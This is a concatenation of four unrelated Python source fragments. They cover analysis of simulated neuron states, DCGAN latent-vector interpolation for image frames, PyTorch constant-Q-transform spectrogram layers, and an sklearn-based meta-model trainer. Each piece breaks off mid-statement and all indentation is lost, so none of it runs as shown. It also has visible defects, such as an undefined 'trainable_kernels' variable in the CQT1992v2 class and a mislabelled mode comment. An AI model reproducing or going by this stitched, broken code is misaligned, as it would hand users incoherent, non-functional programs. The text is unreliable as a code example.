all_corrs=correlation(state_neurons)
#move graphs and outputs
if plot:
if plot_elbow: os.rename('elbow.png',dr+'_elbow.png')
if plot_fr: subplot(fname=os.path.join(b.pathlink, 'Frate.txt'), outputfigname=dr+'_frate.png', tstep=5,\
title='Fano Factors: '+FFall, tight=False, dpi=100)
if plot_elbow: b_graphs.move_from(dr+'_elbow.png',b.pathlink)
if plot_fr: b_graphs.move_from(dr+'_frate.png',b.pathlink)
if plot_pca: b_graphs.move_from(dr+'_pcaPS.png',b.pathlink)
if deter_info:
vals=[ed[key] for key in sorted(ed.keys())]
numEP, esc_rate, ratio= str(len(ed.keys())), '_'.join(bcs.to_string(vals)), str(ratio)
bcs.output_line(os.path.join(b_res.pathlink,outfile),\
' '.join([dr,numEP, esc_rate,ratio,FFall,pall]))
if deter_corr:
bcs.output_line(os.path.join(b_res.pathlink,corrfile),\
' '.join([dr]+all_corrs))
if deter_EP:
bcs.output_line(os.path.join(b_res.pathlink,EPfile),\
' '.join([dr]+EP4))
os.chdir(motherpath)
return allpms
def plot_pcaEPs(runnum, plot=False, motherpath=os.getcwd(), trans='fffsfss', feature='i'):
'''
Plots the cooridnates of the EPs on 2-dimensions (determined by pca).
'''
b_res=clss.branch('results_'+str(runnum),motherpath)
b_pcaEP=clss.branch('pcaEP',b_res.pathlink)
b_pcaEP.mkdir()
os.chdir(b_pcaEP.pathlink)
#reevaluation
newfile=os.path.join(b_res.pathlink, 'new-info.txt')
EPfile=os.path.join(b_res.pathlink, 'EPcoor.txt')
Ent=clss.entry(' 0', [' 6'])
Ent2=clss.entry(' 0', [])
data=Ent.readdata_and_fix(newfile)
EPcoorss=Ent2.readdata_and_fix(EPfile, quick_format=True)
#sort pms by motifs(ID)
IDdic, coldic={}, {}
for key in data.keys():
pm=parameter([], [])
pm.assign_name(key, trans_method='iiiiss')
motID, col=pm.extract('ID'), pm.extract(feature)
if motID not in IDdic.keys(): IDdic[motID]=[]
if motID not in coldic.keys(): coldic[motID]=[]
actual_coors=[bcs.to_float(cr.split('_')) for cr in EPcoorss[key]]
#reevaluation
if data[key][0]=='o':
IDdic[motID]+=actual_coors
coldic[motID]+=[int(col)]*len(actual_coors)
else:
IDdic[motID]+=[list(np.mean(actual_coors,axis=0))]
coldic[motID]+=[int(col)]
for motID in IDdic.keys():
print(motID)
EP_coors=IDdic[motID]
#pca
trans_train, vectors = pca(EP_coors, EP_coors)
vec_strs = [str(round(vec[0],2))+' '+str(round(vec[1],2)) for vec in vectors]
#elbow then pca
nclusters, new_EP_coors, label_train, ratio = EP(EP_coors, nmax=6, plot=False)
new_trans_train = pca(EP_coors, new_EP_coors)[0]
if plot:
plt.plot([item[0] for item in trans_train], [item[1] for item in trans_train], 'k.')
plt.plot([item[0] for item in new_trans_train], [item[1] for item in new_trans_train], 'b.')
plt.xlabel('dim1: '+vec_strs[0], fontsize=14)
plt.ylabel('dim2: '+vec_strs[1], fontsize=14)
plt.savefig('pcaEP_'+motID+'.png', dpi=200)
plt.close('all')
#try
from dynalysis.data_visualization import plot_continuous_colorbar
plot_continuous_colorbar([item[0] for item in trans_train], [item[1] for item in trans_train],\
coldic[motID], 'dim1: '+vec_strs[0], 'dim2: '+vec_strs[1], feature,\
svf='pcaEP_'+motID+'_'+feature+'.png')
bcs.output_clf('pcaEP_'+motID+'.txt')
bcs.output_double('pcaEP_'+motID+'.txt', EP_coors)
os.chdir(motherpath)
return 0
def evaluation_by_FF(runnum, infile='info.txt', FF_criteria=30, cp=False):
'''
Evaluates the number of clusters based off ratio, Fano Factor, correlation and ON/OFF.
parameters:
*data: a dictionary with motifID as key and [numEP, esc_rate, ratio, FF1, FF2, FF3, FF4] as values
'''
#dir
file=os.path.join(os.getcwd(),'results_'+runnum, infile)
ofile=os.path.join(os.getcwd(),'results_'+runnum, 're-'+infile)
nfile=os.path.join(os.getcwd(),'results_'+runnum, 'new-'+infile)
b_res_path=os.path.join(os.getcwd(),'results_'+runnum)
b_graphs=clss.branch('graphs', b_res_path)
if cp:
b_regraphs_s=clss.branch('re-graphs-s', b_res_path)
b_regraphs_n=clss.branch('re-graphs-n', b_res_path)
b_regraphs_s.mkdir()
b_regraphs_n.mkdir()
bcs.output_clf(ofile)
bcs.output_clf(nfile)
Ent=clss.entry(' 0', [' 1', ' 2', ' 3', ' 4_0', ' 4_1', ' 4_2', ' 4_3', ' 5_0', ' 5_1', ' 5_2', ' 5_3'])
data=Ent.readdata_and_fix(file)
#main
new_data={}
for key in data:
numEP, esc_rate, ratio, FF1, FF2, FF3, FF4, pw1, pw2, pw3, pw4 = data[key]
FFlist=bcs.to_float([FF1, FF2, FF3, FF4])
FFstring='_'.join([FF1, FF2, FF3, FF4])
pwlist=bcs.to_float([pw1, pw2, pw3, pw4])
pwstring='_'.join([pw1, pw2, pw3, pw4])
deter1=(int(numEP)>1) #can only have FPs if numEP>1 by definition
deter2=lower_than(FFlist, FF_criteria) #if FF is too low
deter3=lower_than(bcs.to_float(esc_rate.split('_')),0.1) #whether all escape rate is < 0.1
deter4=lower_than(pwlist,5) #whether | |
# 16 # PARAM
stored_images = 0
num_queued_images = 0
base_json_path = base_dir
seedA = []
seedB = []
with open(base_json_path + '/' + interp_data[0][0] + ".json", 'r') as f:
seedA = json.load(f)
with open(base_json_path + '/' + interp_data[0][1] + ".json", 'r') as f:
seedB = json.load(f)
total_frame_num = 0
for i in range(len(interp_data)):
total_frame_num += interp_data[i][2]
curr_cut_idx = 0
rand_batch_z = rand_state.uniform(-1, 1, size=(2 , dcgan.z_dim))
z1 = np.asarray(seedA, dtype=np.float32)
z2 = np.asarray(seedB, dtype=np.float32)
while stored_images < total_frame_num:
batch_idx = 0
batch_seeds = np.zeros(shape=(config.batch_size, 100), dtype=np.float32)
while batch_idx < config.batch_size:
interp_idx = num_queued_images % steps_per_interp
steps_per_interp_mode = steps_per_interp
if mode_num == 2 or mode_num == 6: # And not last frame
steps_per_interp_mode = steps_per_interp + 1
ratio = np.linspace(0, 1, steps_per_interp_mode)[interp_idx]
ratio = np.float32(ratio)
print(" ratio: " + str(ratio))
if mode_num == 1 or mode_num == 2:
result_z = slerp(ratio, z1, z2)
elif mode_num == 6: # Mode 6
result_z = lerp(ratio, z1, z2)
elif mode_num == 7: # Mode 6
result_z = wrap_lerp(ratio, z1, z2, cut)
elif mode_num == 9:
result_z = exp_ease(ratio, z1, z2, cut)
elif mode_num == 10:
result_z = sinusoid_ease(ratio, z1, z2, cut)
elif mode_num == 11:
result_z = flicker_lerp(ratio, z1, z2, rand_state, cut)
elif mode_num == 12:
result_z = exp_ease_inout(ratio, z1, z2, cut)
elif mode_num == 13:
result_z = exp_ease_inout(ratio, z1, z2, cut)
result_z = step_flicker(result_z, rand_state, cut)
elif mode_num == 14:
result_z = slerp(ratio, z1, z2)
result_z = step_flicker(result_z, rand_state, cut)
else:
result_z = z1 # If here, then no mode num def. Error.
batch_seeds[batch_idx] = result_z
batch_idx += 1
num_queued_images += 1
if num_queued_images % steps_per_interp == 0:
# interp_frame_nums = [8, 16, 32, 8, 25, 36, 85, 7, 16, 10, 40, 10, 30, 20, 30, 34, 50, 25, 50, 100, 120, 250, 300, 512]
curr_cut_idx += 1
if curr_cut_idx >= len(interp_data):
continue
steps_per_interp = interp_data[curr_cut_idx][2]
num_queued_images = 0
# if is_rand_steps_per_interp:
# steps_per_interp = interp_frame_nums[random.randint(0, len(interp_frame_nums)-1)]
rand_batch_z = rand_state.uniform(-1, 1, size=(config.batch_size , dcgan.z_dim))
# Read new json to z1
with open(base_json_path + '/' + interp_data[curr_cut_idx][0] + ".json", 'r') as f:
seedA = json.load(f)
with open(base_json_path + '/' + interp_data[curr_cut_idx][1] + ".json", 'r') as f:
seedB = json.load(f)
z1 = np.asarray(seedA, dtype=np.float32)
z2 = np.asarray(seedB, dtype=np.float32)
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: batch_seeds})
# Naming
for i in range(config.batch_size):
json_file = config.gen_json.split("/")[-1]
json_file_name = json_file.split(".")[0]
save_name = '{}_{}_{}_{:05d}'.format(json_file_name, config.dataset, time_stamp , count)
count += 1
# TODO: Create timestampt dir
img_path = config.sample_dir + "/" + save_name + '.png'
scipy.misc.imsave(img_path, samples[i, :, :, :])
print(Fore.CYAN + "Continuous random interp image generated: " + img_path)
stored_images += 1
if stored_images >= total_frame_num:
return count
return count
def exp_ease(ratio, low, high, cut):
is_ease_in = cut["is_ease_in"]
power = cut["power"]
if is_ease_in:
result = (high-low) * np.power(ratio, power) + low
else:
result = -(high-low) * (np.float_power(abs(ratio-1), power) - 1) + low
return result
def exp_ease_inout(ratio, low, high, cut):
power = cut["power"]
t = ratio * 2.0
if t < 1.0:
result = ((high-low)/2.0) * np.power(t, power) + low
else:
result = -((high-low)/2.0) * (np.float_power(abs(t-2), power) - 2) + low
return result
def sinusoid_ease(ratio, low, high, cut):
is_ease_in = cut["is_ease_in"]
if is_ease_in:
return -(high-low) * np.cos(ratio * np.pi / 2.0) + (high-low) + low
else:
return (high-low) * np.sin(ratio * np.pi / 2.0) + low
def lerp(val, low, high):
return low + (high - low) * val
def flicker_lerp(val, low, high, rand_state, cut):
max_step = cut["max_step"]
rand_offset = (rand_state.rand(low.shape[0]) - np.float32(0.5)) * np.float32(2.0)
return low + (high - low) * val + rand_offset * max_step
def slerp(val, low, high):
"""Code from https://github.com/soumith/dcgan.torch/issues/14"""
# print("MEEE slepr low: " + str(low.shape) + ", high: " + str(high.shape))
omega = np.arccos(np.clip(np.dot(low/np.linalg.norm(low), high/np.linalg.norm(high)), -1, 1))
so = np.sin(omega)
print("omega: " + str(omega) + " so: " + str(so) + " val: " + str(val))
print("typeomega: " + str(type(omega)) + " typeso: " + str(type(so)) + " val type: " + str(type(val)))
if so == 0:
return (1.0-val) * low + val * high # L'Hopital's rule/LERP
result = np.sin((1.0-val)*omega) / so * low + np.sin(val*omega) / so * high
if val <= 0.0:
print(str(result - low))
return result
def visualize(sess, dcgan, config, option):
image_frame_dim = int(math.ceil(config.batch_size**.5))
if option == 0:
z_sample = np.random.uniform(-0.5, 0.5, size=(config.batch_size, dcgan.z_dim))
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample})
save_images(samples, [image_frame_dim, image_frame_dim], './samples/test_%s.png' % strftime("%Y-%m-%d-%H-%M-%S", gmtime()))
elif option == 1:
values = np.arange(0, 1, 1./config.batch_size)
for idx in xrange(dcgan.z_dim):
print(" [*] %d" % idx)
z_sample = np.random.uniform(-1, 1, size=(config.batch_size , dcgan.z_dim))
for kdx, z in enumerate(z_sample):
z[idx] = values[kdx]
if config.dataset == "mnist":
y = np.random.choice(10, config.batch_size)
y_one_hot = np.zeros((config.batch_size, 10))
y_one_hot[np.arange(config.batch_size), y] = 1
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample, dcgan.y: y_one_hot})
else:
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample})
print("MEEE samples shape: " + str(samples.shape))
save_images(samples, [image_frame_dim, image_frame_dim], './samples/test_arange_%s.png' % (idx))
elif option == 2:
values = np.arange(0, 1, 1./config.batch_size)
for idx in [random.randint(0, dcgan.z_dim - 1) for _ in xrange(dcgan.z_dim)]:
print(" [*] %d" % idx)
z = np.random.uniform(-0.2, 0.2, size=(dcgan.z_dim))
z_sample = np.tile(z, (config.batch_size, 1))
#z_sample = np.zeros([config.batch_size, dcgan.z_dim])
for kdx, z in enumerate(z_sample):
z[idx] = values[kdx]
if config.dataset == "mnist":
y = np.random.choice(10, config.batch_size)
y_one_hot = np.zeros((config.batch_size, 10))
y_one_hot[np.arange(config.batch_size), y] = 1
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample, dcgan.y: y_one_hot})
else:
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample})
try:
make_gif(samples, './samples/test_gif_%s.gif' % (idx))
except:
save_images(samples, [image_frame_dim, image_frame_dim], './samples/test_%s.png' % strftime("%Y-%m-%d-%H-%M-%S", gmtime()))
elif option == 3:
values = np.arange(0, 1, 1./config.batch_size)
for idx in xrange(dcgan.z_dim):
print(" [*] %d" % idx)
z_sample = np.zeros([config.batch_size, dcgan.z_dim])
for kdx, z in enumerate(z_sample):
z[idx] = values[kdx]
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample})
make_gif(samples, './samples/test_gif_%s.gif' % (idx))
elif option == 4:
image_set = []
values = np.arange(0, 1, 1./config.batch_size)
for idx in xrange(dcgan.z_dim):
print(" [*] %d" % idx)
z_sample = np.zeros([config.batch_size, dcgan.z_dim])
for kdx, z in enumerate(z_sample): z[idx] = values[kdx]
image_set.append(sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample}))
make_gif(image_set[-1], './samples/test_gif_%s.gif' % (idx))
new_image_set = [merge(np.array([images[idx] for images in image_set]), [10, 10]) \
for idx in range(64) + range(63, -1, -1)]
make_gif(new_image_set, './samples/test_gif_merged.gif', duration=8)
def generate_flicker(sess, dcgan, rand_state, config, base_dir, time_stamp, cut, count):
# params = cut["params"]
stored_images = 0
num_queued_images = 0
start_image_json = cut["start_image"]
total_frame_num = cut["total_frame_num"]
# base_json_path = cut["base_dir"]
mode_num = cut["mode_num"]
with open("/".join((base_dir, start_image_json)) + ".json") as f:
start_seed = json.load(f)
start_seed = np.asarray(start_seed, dtype=np.float32)
max_step = cut["max_step"]
while stored_images < total_frame_num:
batch_idx = 0
# batch_seeds = np.zeros(shape=(config.batch_size, Gs.input_shapes[0][1]), dtype=np.float32)
batch_seeds = np.zeros(shape=(config.batch_size, 100), dtype=np.float32)
while batch_idx < config.batch_size:
if mode_num == 8:
curr_seed = step_flicker(start_seed, rand_state, cut)
batch_seeds[batch_idx] = curr_seed
batch_idx += 1
num_queued_images += 1
# labels = np.zeros([batch_seeds[0].shape[0]] + Gs.input_shapes[1][1:]) # Dummy data input
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: batch_seeds})
# samples = Gs.run(batch_seeds, labels)
# samples = np.swapaxes(samples, 2, 3)
# samples = np.swapaxes(samples, 1, 3)
# Save
for i in range(config.batch_size):
json_file = config.gen_json.split("/")[-1]
json_file_name = json_file.split(".")[0]
save_name = '{}_{}_{}_{:05d}'.format(json_file_name, config.dataset, time_stamp , count)
count += 1
img_path = config.sample_dir + "/" + save_name + '.png'
scipy.misc.imsave(img_path, samples[i, :, :, :])
print(Fore.CYAN + "Image saved: " + img_path)
stored_images += 1
if stored_images >= total_frame_num:
print(Fore.CYAN + "Done !")
return count
return count
def step_flicker(start_seed, rand_state, cut):
max_step = cut["max_step"]
rand_offset = (rand_state.rand(start_seed.shape[0]) - np.float32(0.5)) * np.float32(2.0)
return start_seed + np.float32(max_step) * rand_offset
def wrap_lerp(val, low, high, cut, is_buggy=False):
# overflow_buffer = cut["overflow_buffer"]
overflow_buffer = 0.0
usual_cutoff = cut["usual_cutoff"]
inner_dist = np.absolute(high - low)
max_dist = np.maximum(np.absolute(high), np.absolute(low))
result = np.zeros(low.shape, dtype=np.float32)
normal_wrap_count = 0
for i in range(low.shape[0]):
curr_cutoff = usual_cutoff
if max_dist[i] > usual_cutoff:
outlier_cutoff = max_dist[i] + overflow_buffer
curr_cutoff = outlier_cutoff
wrap_dist = outlier_cutoff * 2.0 - inner_dist[i]
else:
wrap_dist = usual_cutoff * 2.0 - inner_dist[i]
# val = 1.0 # NOTE: DEBUG
if wrap_dist < inner_dist[i]:
# Wrap lerp
vect_oppo = - (high[i] - low[i]) / np.absolute(high[i] - low[i])
curr_lerped = low[i] + vect_oppo * val * wrap_dist
# print("bef clamp: " + str(curr_lerped))
if curr_lerped > curr_cutoff:
old_val = curr_lerped
curr_lerped = -curr_cutoff + (curr_lerped - curr_cutoff)
print("Wrap " + str(i) | |
make it a torch tensor
if verbose==True:
print("Creating low pass filter ...", end='\r')
start = time()
lowpass_filter = torch.tensor(create_lowpass_filter(
band_center = 0.5,
kernelLength=256,
transitionBandwidth=0.001
)
)
# Broadcast the tensor to the shape that fits conv1d
self.register_buffer('lowpass_filter', lowpass_filter[None,None,:])
if verbose==True:
print("Low pass filter created, time used = {:.4f} seconds".format(time()-start))
# Calculate num of filter requires for the kernel
# n_octaves determines how many resampling requires for the CQT
n_filters = min(bins_per_octave, n_bins)
self.n_octaves = int(np.ceil(float(n_bins) / bins_per_octave))
# print("n_octaves = ", self.n_octaves)
# Calculate the lowest frequency bin for the top octave kernel
self.fmin_t = fmin*2**(self.n_octaves-1)
remainder = n_bins % bins_per_octave
# print("remainder = ", remainder)
if remainder==0:
# Calculate the top bin frequency
fmax_t = self.fmin_t*2**((bins_per_octave-1)/bins_per_octave)
else:
# Calculate the top bin frequency
fmax_t = self.fmin_t*2**((remainder-1)/bins_per_octave)
self.fmin_t = fmax_t/2**(1-1/bins_per_octave) # Adjusting the top minium bins
if fmax_t > sr/2:
raise ValueError('The top bin {}Hz has exceeded the Nyquist frequency, \
please reduce the n_bins'.format(fmax_t))
if self.earlydownsample == True: # Do early downsampling if this argument is True
if verbose==True:
print("Creating early downsampling filter ...", end='\r')
start = time()
sr, self.hop_length, self.downsample_factor, early_downsample_filter, \
self.earlydownsample = get_early_downsample_params(sr,
hop_length,
fmax_t,
Q,
self.n_octaves,
verbose)
self.register_buffer('early_downsample_filter', early_downsample_filter)
if verbose==True:
print("Early downsampling filter created, \
time used = {:.4f} seconds".format(time()-start))
else:
self.downsample_factor=1.
# Preparing CQT kernels
if verbose==True:
print("Creating CQT kernels ...", end='\r')
start = time()
# print("Q = {}, fmin_t = {}, n_filters = {}".format(Q, self.fmin_t, n_filters))
basis, self.n_fft, _ = create_cqt_kernels(Q,
sr,
self.fmin_t,
n_filters,
bins_per_octave,
norm=basis_norm,
topbin_check=False)
# This is for the normalization in the end
freqs = fmin * 2.0 ** (np.r_[0:n_bins] / np.float(bins_per_octave))
lenghts = np.ceil(Q * sr / freqs)
lenghts = torch.tensor(lenghts).float()
self.register_buffer('lenghts', lenghts)
self.basis=basis
fft_basis = fft(basis)[:,:self.n_fft//2+1] # Convert CQT kenral from time domain to freq domain
# These cqt_kernel is already in the frequency domain
cqt_kernels_real = torch.tensor(fft_basis.real.astype(np.float32))
cqt_kernels_imag = torch.tensor(fft_basis.imag.astype(np.float32))
if verbose==True:
print("CQT kernels created, time used = {:.4f} seconds".format(time()-start))
# print("Getting cqt kernel done, n_fft = ",self.n_fft)
# Preparing kernels for Short-Time Fourier Transform (STFT)
# We set the frequency range in the CQT filter instead of here.
if verbose==True:
print("Creating STFT kernels ...", end='\r')
start = time()
kernel_sin, kernel_cos, self.bins2freq, _, window = create_fourier_kernels(self.n_fft, window='ones', freq_scale='no')
wsin = kernel_sin * window
wcos = kernel_cos * window
wsin = torch.tensor(wsin)
wcos = torch.tensor(wcos)
if verbose==True:
print("STFT kernels created, time used = {:.4f} seconds".format(time()-start))
if trainable_STFT:
wsin = torch.nn.Parameter(wsin, requires_grad=trainable_kernels)
wcos = torch.nn.Parameter(wcos, requires_grad=trainable_kernels)
self.register_parameter('wsin', wsin)
self.register_parameter('wcos', wcos)
else:
self.register_buffer('wsin', wsin)
self.register_buffer('wcos', wcos)
if trainable_CQT:
cqt_kernels_real = torch.nn.Parameter(cqt_kernels_real, requires_grad=trainable_kernels)
cqt_kernels_imag = torch.nn.Parameter(cqt_kernels_imag, requires_grad=trainable_kernels)
self.register_parameter('cqt_kernels_real', cqt_kernels_real)
self.register_parameter('cqt_kernels_imag', cqt_kernels_imag)
else:
self.register_buffer('cqt_kernels_real', cqt_kernels_real)
self.register_buffer('cqt_kernels_imag', cqt_kernels_imag)
# If center==True, the STFT window will be put in the middle, and paddings at the beginning
# and ending are required.
if self.pad_mode == 'constant':
self.padding = nn.ConstantPad1d(self.n_fft//2, 0)
elif self.pad_mode == 'reflect':
self.padding = nn.ReflectionPad1d(self.n_fft//2)
def forward(self,x, output_format=None):
"""
Convert a batch of waveforms to CQT spectrograms.
Parameters
----------
x : torch tensor
Input signal should be in either of the following shapes.\n
1. ``(len_audio)``\n
2. ``(num_audio, len_audio)``\n
3. ``(num_audio, 1, len_audio)``
It will be automatically broadcast to the right shape
"""
output_format = output_format or self.output_format
x = broadcast_dim(x)
if self.earlydownsample==True:
x = downsampling_by_n(x, self.early_downsample_filter, self.downsample_factor)
hop = self.hop_length
CQT = get_cqt_complex(x, self.wcos, self.wsin, hop, self.padding) # Getting the top octave CQT
x_down = x # Preparing a new variable for downsampling
for i in range(self.n_octaves-1):
hop = hop//2
x_down = downsampling_by_2(x_down, self.lowpass_filter)
CQT1 = get_cqt_complex(x_down, self.wcos, self.wsin, hop, self.padding)
CQT = torch.cat((CQT1, CQT),1)
CQT = CQT[:,-self.n_bins:,:] # Removing unwanted top bins
if self.norm:
CQT = CQT/self.n_fft*torch.sqrt(self.lenghts.view(-1,1,1))
else:
CQT = CQT*torch.sqrt(self.lenghts.view(-1,1,1))
# Normalizing the output with the downsampling factor, 2**(self.n_octaves-1)
# is make it same mag as 1992
CQT = CQT*self.downsample_factor
if output_format=='Magnitude':
# Getting CQT Amplitude
return torch.sqrt(CQT.pow(2).sum(-1))
elif output_format=='Complex':
return CQT
elif output_format=='Phase':
phase_real = torch.cos(torch.atan2(CQT[:,:,:,1],CQT[:,:,:,0]))
phase_imag = torch.sin(torch.atan2(CQT[:,:,:,1],CQT[:,:,:,0]))
return torch.stack((phase_real,phase_imag), -1)
def extra_repr(self) -> str:
return 'STFT kernel size = {}, CQT kernel size = {}'.format(
(*self.wcos.shape,), (*self.cqt_kernels_real.shape,)
)
class CQT1992v2(torch.nn.Module):
"""This function is to calculate the CQT of the input signal.
Input signal should be in either of the following shapes.\n
1. ``(len_audio)``\n
2. ``(num_audio, len_audio)``\n
3. ``(num_audio, 1, len_audio)``
The correct shape will be inferred autommatically if the input follows these 3 shapes.
Most of the arguments follow the convention from librosa.
This class inherits from ``torch.nn.Module``, therefore, the usage is same as ``torch.nn.Module``.
This alogrithm uses the method proposed in [1]. I slightly modify it so that it runs faster
than the original 1992 algorithm, that is why I call it version 2.
[1] Brown, <NAME>. and <NAME>. “An efficient algorithm for the calculation of a
constant Q transform.” (1992).
Parameters
----------
sr : int
The sampling rate for the input audio. It is used to calucate the correct ``fmin`` and ``fmax``.
Setting the correct sampling rate is very important for calculating the correct frequency.
hop_length : int
The hop (or stride) size. Default value is 512.
fmin : float
The frequency for the lowest CQT bin. Default is 32.70Hz, which coresponds to the note C0.
fmax : float
The frequency for the highest CQT bin. Default is ``None``, therefore the higest CQT bin is
inferred from the ``n_bins`` and ``bins_per_octave``.
If ``fmax`` is not ``None``, then the argument ``n_bins`` will be ignored and ``n_bins``
will be calculated automatically. Default is ``None``
n_bins : int
The total numbers of CQT bins. Default is 84. Will be ignored if ``fmax`` is not ``None``.
bins_per_octave : int
Number of bins per octave. Default is 12.
norm : int
Normalization for the CQT kernels. ``1`` means L1 normalization, and ``2`` means L2 normalization.
Default is ``1``, which is same as the normalization used in librosa.
window : str
The windowing function for CQT. It uses ``scipy.signal.get_window``, please refer to
scipy documentation for possible windowing functions. The default value is 'hann'.
center : bool
Putting the CQT keneral at the center of the time-step or not. If ``False``, the time index is
the beginning of the CQT kernel, if ``True``, the time index is the center of the CQT kernel.
Default value if ``True``.
pad_mode : str
The padding method. Default value is 'reflect'.
trainable : bool
Determine if the CQT kernels are trainable or not. If ``True``, the gradients for CQT kernels
will also be caluclated and the CQT kernels will be updated during model training.
Default value is ``False``.
output_format : str
Determine the return type.
``Magnitude`` will return the magnitude of the STFT result, shape = ``(num_samples, freq_bins,time_steps)``;
``Complex`` will return the STFT result in complex number, shape = ``(num_samples, freq_bins,time_steps, 2)``;
``Phase`` will return the phase of the STFT reuslt, shape = ``(num_samples, freq_bins,time_steps, 2)``.
The complex number is stored as ``(real, imag)`` in the last axis. Default value is 'Magnitude'.
verbose : bool
If ``True``, it shows layer information. If ``False``, it suppresses all prints
Returns
-------
spectrogram : torch.tensor
It returns a tensor of spectrograms.
shape = ``(num_samples, freq_bins,time_steps)`` if ``output_format='Magnitude'``;
shape = ``(num_samples, freq_bins,time_steps, 2)`` if ``output_format='Complex' or 'Phase'``;
Examples
--------
>>> spec_layer = Spectrogram.CQT1992v2()
>>> specs = spec_layer(x)
"""
def __init__(self, sr=22050, hop_length=512, fmin=32.70, fmax=None, n_bins=84,
bins_per_octave=12, norm=1, window='hann', center=True, pad_mode='reflect',
trainable=False, output_format='Magnitude', verbose=True):
super().__init__()
# norm arg is not functioning
self.trainable = trainable
self.hop_length = hop_length
self.center = center
self.pad_mode = pad_mode
self.output_format = output_format
# creating kernels for CQT
Q = 1/(2**(1/bins_per_octave)-1)
if verbose==True:
print("Creating CQT kernels ...", end='\r')
start = time()
cqt_kernels, self.kernel_width, lenghts = create_cqt_kernels(Q,
sr,
fmin,
n_bins,
bins_per_octave,
norm,
window,
fmax)
self.register_buffer('lenghts', lenghts)
cqt_kernels_real = torch.tensor(cqt_kernels.real).unsqueeze(1)
cqt_kernels_imag = torch.tensor(cqt_kernels.imag).unsqueeze(1)
if trainable:
cqt_kernels_real = torch.nn.Parameter(cqt_kernels_real, requires_grad=trainable_kernels)
cqt_kernels_imag = torch.nn.Parameter(cqt_kernels_imag, requires_grad=trainable_kernels)
self.register_parameter('cqt_kernels_real', cqt_kernels_real)
self.register_parameter('cqt_kernels_imag', cqt_kernels_imag)
else:
self.register_buffer('cqt_kernels_real', cqt_kernels_real)
self.register_buffer('cqt_kernels_imag', cqt_kernels_imag)
if verbose==True:
print("CQT kernels created, time used = {:.4f} seconds".format(time()-start))
def forward(self,x, output_format=None):
"""
Convert a batch of waveforms | |
<gh_stars>0
"""
This module provides a prototypical interface that allows the user to
train approximation models based on given training datasets.
"""
import copy
import numpy as np
import pandas
from scipy.stats import randint as sp_randint
from scipy.stats import uniform as sp_uniform
from sklearn import neighbors, tree
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.kernel_ridge import KernelRidge
from sklearn.linear_model import LinearRegression, MultiTaskLassoCV, RidgeCV
from sklearn.linear_model.coordinate_descent import MultiTaskElasticNetCV
from sklearn.metrics import (make_scorer, mean_absolute_error,
mean_squared_error, r2_score)
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV
from sklearn.multioutput import MultiOutputRegressor
from sklearn.neural_network.multilayer_perceptron import MLPRegressor
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing.data import StandardScaler
from sklearn.svm import SVR
from memobuilder.mtrainer import scores
class MetaModel(object):
"""
This class serves as a superclass for all approximation models and
provides a common interface to be used by the Trainer and outside
of this module. It manages a chain of preprocessing steps and
provides the methods :meth:`fit` and :meth:`predict` to fit the
concrete model to the given training data and to predict output
values given the respective inputs.
:param kwargs: arbitrary keyword arguments that will be passed to
*this.model* when it is fitted to the training data.
"""
train_score = {
'r2_score': {
'name': 'r2_score', 'function': make_scorer(
r2_score, greater_is_better=True)},
'mae': {
'name': 'mean_absolute_error',
'function': make_scorer(
mean_absolute_error, greater_is_better=False)},
'hae': {
'name': 'harmonic_ average_error',
'function': make_scorer(
scores.harmonic_averages_error, greater_is_better=False)},
'mse': {
'name': 'mean_squared_error',
'function': make_scorer(
mean_squared_error, greater_is_better=False)}}
def __init__(self, input_names=None, response_names=None,
preprocessors=None, trainer_score='r2_score', **kwargs):
"""
:param kwargs: arbitrary keyword arguments that will be passed
to *this.regression_pipeline* when it is fitted to the
training data.
"""
if input_names is None:
input_names = []
if response_names is None:
response_names = []
if preprocessors is None:
preprocessors = []
self.kwargs = kwargs
# An sklearn Pipeline.
# See http://scikit-learn.org/stable/modules/generated/ \
# sklearn.pipeline.Pipeline.html#sklearn.pipeline.Pipeline
self.regression_pipeline = None
# A list of dataset transformations that will be added to the
# pipeline before the model will be fitted to the data.
self.processing_steps = preprocessors
# A list of input names in the same order as in the training
# dataset. The trainer class sets this value according to the
# dataset used for the training.
self.input_names = input_names
# A list of response names in the same order as in the training
# dataset. The trainer class sets this value according to the
# dataset used for the training.
self.response_names = response_names
self.score = self.train_score[trainer_score]
def fit(self, x_train, y_train):
"""
Fits the model to the data such that it reproduces the expected
output data. Raises an exception because this method must be
implemented by concrete MetaModel implementations.
:param x_train: array-like of shape [n_samples,n_features]
training data
:param y_train: array-like of shape [n_samples, n_targets]
target values
"""
raise Exception('Not implemented')
def predict(self, X):
"""
Uses *self.regression_pipeline* to predict an output value
for input vector *X*.
:param X: array-like, shape = (n_samples, n_features)
Input data
:return: array, shape = (n_samples, n_outputs)
Returns predicted values.
"""
val = self.regression_pipeline.predict(X)
return pandas.DataFrame(val, columns=self.response_names)
def _update_pipeline_and_fit(self, x_train, y_train, steps):
"""
Constructs a pipeline, fits it to the input and output data and
:param x_train: array-like, shape = (n_samples, n_features)
input data
:param y_train: array-like, shape = (n_samples, n_outputs)
output data
:param steps: list of data transformations
data transformations to add to the model pipeline.
"""
# work on a copy of the pipeline, so that it can be reused
processing_steps = copy.copy(self.processing_steps)
for step in steps:
processing_steps.append(step)
pipeline = make_pipeline(*processing_steps)
# perform preprocessing and create metamodel
self.regression_pipeline = pipeline.fit(x_train, y_train)
if hasattr(pipeline._final_estimator, 'best_params_'):
print('best params: ',
pipeline._final_estimator.best_params_)
def create_model_parameter_dict(self, key_value):
return {arg.key: arg.value for arg in key_value}
def __repr__(self):
return '%s [%s]' % (self.__class__.__name__, str(self.__dict__))
class OLSModel(MetaModel):
"""
Fits a linear model to the data using ordinary least squares method.
See http://scikit-learn.org/stable/modules/linear_model.html for a
more detailed explanation of this method.
:param kwargs: keyword arguments that will be passed to the
constructor of the LinearRegression model.
"""
def __init__(self, **kwargs):
MetaModel.__init__(self, **kwargs)
def fit(self, x_train, y_train):
"""
